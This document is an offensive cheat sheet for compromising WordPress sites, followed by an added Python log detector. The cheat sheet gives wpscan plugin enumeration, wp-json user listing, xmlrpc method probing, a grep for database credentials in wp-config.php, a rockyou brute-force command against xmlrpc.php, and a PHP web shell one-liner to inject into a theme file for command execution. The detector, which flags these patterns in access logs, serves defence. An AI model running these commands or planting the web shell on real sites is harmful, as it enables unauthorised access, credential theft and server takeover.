WordPress
WordPress Enumeration
WP Scan
Scan all plugins:
wpscan --url http://<ip> --enumerate ap --plugins-detection aggressive --api-token <api-token> -v
Important: always run a full plugin scan, since many plugins are vulnerable.
WP-JSON
User Info:
/wp-json/wp/v2/users
/wp-json/oembed/1.0/embed?url=POST-URL
Page Info:
/wp-json/wp/v2/pages
XML-RPC
Check whether /xmlrpc.php is enabled by POSTing this body to it; it lists the methods the endpoint exposes:
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
wp-config.php
Hunting for Credentials:
If wp-config.php can be read, look for the SQL database credentials:
grep 'DB_USER\|DB_PASSWORD' wp-config.php
Useful after an arbitrary file read, or for privilege escalation.
Attacking
Login Bruteforce:
sudo wpscan --password-attack xmlrpc -t 20 -U <user> -P /usr/share/wordlists/rockyou.txt --url http://<url>
Code Execution:
Requires admin access. Inject this into a theme file in the Theme Editor:
<?php system($_GET['cmd']); ?>
Then request the edited PHP page with
?cmd=<command>
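The enumeration and attack paths above (wp-json user listing, xmlrpc.php brute force, theme-editor writes and the resulting cmd= requests) all leave traces in the web server's access log. The following detector is an added example, not part of this note or of wpscan; it runs over constructed combined-log lines and the threshold and indicator names are assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed sample lines in Apache combined log format (not a real capture).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:12:00:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:12:00:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:12:00:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:12:01:10 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 812 "-" "curl/8.0"
192.0.2.9 - - [10/Oct/2023:12:05:00 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Oct/2023:12:05:30 +0000] "GET /wp-content/themes/mytheme/404.php?cmd=id HTTP/1.1" 200 55 "-" "Mozilla/5.0"
10.0.0.3 - - [10/Oct/2023:12:06:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Source IP, request method, request path and status from one combined-log line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

XMLRPC_THRESHOLD = 3  # assumed: POSTs to xmlrpc.php from one source before it is flagged


def analyze(log_text, xmlrpc_threshold=XMLRPC_THRESHOLD):
    """Return {indicator: sorted list of source IPs} for the WordPress abuse patterns above."""
    xmlrpc_posts = Counter()
    findings = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, path = m["ip"], m["method"], m["path"]
        route, _, query = path.partition("?")
        if method == "POST" and route == "/xmlrpc.php":
            xmlrpc_posts[ip] += 1  # the channel wpscan's --password-attack xmlrpc uses
        if route.startswith("/wp-json/wp/v2/users"):
            findings["wp-json user enumeration"].add(ip)
        if method == "POST" and route == "/wp-admin/theme-editor.php":
            findings["theme editor file write"].add(ip)
        if route.startswith("/wp-content/themes/") and route.endswith(".php") and "cmd=" in query:
            findings["theme PHP file requested with cmd parameter"].add(ip)
    for ip, count in xmlrpc_posts.items():
        if count >= xmlrpc_threshold:
            findings["xmlrpc.php login brute force"].add(ip)
    return {k: sorted(v) for k, v in findings.items()}


if __name__ == "__main__":
    for indicator, ips in analyze(SAMPLE_LOG).items():
        print(f"{indicator}: {', '.join(ips)}")
```

Sites that define DISALLOW_FILE_EDIT in wp-config.php remove the Theme Editor path entirely, so a hit on that indicator there is worth a closer look.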
Known Vulnerabilities:
Vulnerable Plugins - mail-masta
Vulnerable Plugins - wpDiscuz